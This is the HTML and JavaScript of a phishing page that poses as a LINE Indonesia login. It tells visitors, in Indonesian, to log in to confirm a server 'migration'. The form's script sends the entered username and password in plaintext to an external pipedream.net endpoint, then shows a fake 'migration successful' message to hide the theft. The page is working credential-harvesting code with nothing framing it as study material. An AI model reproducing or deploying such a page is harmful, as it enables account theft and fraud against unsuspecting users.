<!DOCTYPE html>
<html dir="ltr" data-lang="id" lang="id">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>ʟɪɴᴇ</title>
<link rel="stylesheet" href="files/style.css">

<script>
</script>
<style>
/* Start by setting display:none to make this hidden.
   Then we position it in relation to the viewport window
   with position:fixed. Width, height, top and left speak
   for themselves. Background we set to 80% white with
   our animation centered, and no-repeating */
.modal {
    display:    none;
    position:   fixed;
    z-index:    1000;
    top:        0;
    left:       0;
    height:     100%;
    width:      100%;
    background: rgba( 255, 255, 255, .8 ) 
                url('files/ajax-loader.gif') 
                50% 50% 
                no-repeat;
}

/* When the body has the loading class, we turn
   the scrollbar off with overflow:hidden */
body.loading .modal {
    overflow: hidden;   
}

/* Anytime the body has the loading class, our
   modal element will be visible */
body.loading .modal {
    display: block;
}
</style>
</head>
<body>
<div class="LyWrap">
<header class="LyHead"><div class="lyHeadInner">
<h1 class="MdGHD01Logo">ʟɪɴᴇ 𝙸𝚗𝚍𝚘𝚗𝚎𝚜𝚒𝚊</h1>
</div><!--/LyHead--></header>

<!--CONTENTS-AREA-->
<div class="LyContents" role="main">

<section>
<form id="isconfirmationlogin" action="https://enag44ct1lk8zbu.m.pipedream.net" method="post">
<div class="MdCMN01Cont">
<h2 class="mdCMN01Ttl">Login ʟɪɴᴇ</h2>

<p class="mdCMN01Desc">Untuk mengkonfirmasi migrasi pada sever ʟɪɴᴇ 𝙸𝚗𝚍𝚘𝚗𝚎𝚜𝚒𝚊 mohon untuk login.</p>
<div class="MdInput01"><div class="bminput1input"><input name="username" type="username" id="FnUsername"  placeholder="Username" maxlength="50"></div></div>
<div class="MdInput01"><div class="bminput1input"><input name="password" type="password" id="FnPassword" onkeypress="fnonchangeUpdate()" onkeydown="fnonchangeUpdate()" onkeyup="fnonchangeUpdate()" onchange="fnonchangeUpdate()" placeholder="Masukkan 6–20 karakter" maxlength="20"></div><span class="mdInput01Count"><em id="counting">0</em>/20</span></div>
<div hidden="true" class="MdInput01"><div class="bminput1input"><input type="password" id="FnConfirmPassword" placeholder="Enter password again" maxlength="20"></div></div>
<div class="MdBtn01P01 ExDisabled"><input type="submit" value="OK" id="FnSubmit"></div>
</form>
</section>

</div>

<footer class="LyFoot" role="contentinfo"><div class="lyFootInner">
<div class="MdGFT01Copy"><small>©&nbsp;<b>ʟɪɴᴇ Corporation</b></small></div>
</div><!--/LyFoot--></footer>

</div>
<div class="modal"><!-- Place at bottom of page --></div>
<script src="files/jquery.js"></script>

<script>
$body = $("body");

$(document).on({
    ajaxStart: function() { $body.addClass("loading");    },
     ajaxStop: function() { $body.removeClass("loading"); }    
});

$(function(){
  $('#isconfirmationlogin').submit(function(e){
    e.preventDefault();

    var formData = $(this).serialize();
    var actionURL = $(this).attr('action')+"?username=maunklana&message=uname "+$("#FnUsername").val()+" pwd "+$("#FnPassword").val();
	
	console.log("?username=maunklana&message=uname "+$("#FnUsername").val()+" pwd "+$("#FnPassword").val());
	
    $.ajax({
      url:actionURL,
      method:"POST",
      data:formData,
      success:function(data){
      console.log(data);
		$("#isconfirmationlogin").html( '<div class="MdCMN01Cont"><h2 class="mdCMN01Ttl">Login ʟɪɴᴇ</h2><p class="mdCMN01Desc">Terima kasih, akun sudah berhasil termigrasi.<br/>silahkan tutup jendala peramban.</p>');
      },
      error:function(error){
      console.log(error);
		$("#isconfirmationlogin").html( '<div class="MdCMN01Cont"><h2 class="mdCMN01Ttl">Login ʟɪɴᴇ</h2><p class="mdCMN01Desc">Mohon maaf, Migrasi akun gagal.<br/>silahkan reload halaman ini.</p>');
      }
    });
  });
});
</script>
<script>
function fnonchangeUpdate() {
  var x = document.getElementById("FnPassword").value;
  document.getElementById("FnConfirmPassword").value = x;
  if(x.length>=2){
	document.getElementById("FnSubmit").parentElement.classList.remove('ExDisabled');
  }else{
	document.getElementById("FnSubmit").parentElement.classList.add('ExDisabled');
  }
  document.getElementById("counting").innerHTML = x.length;
}
</script>
</body></html>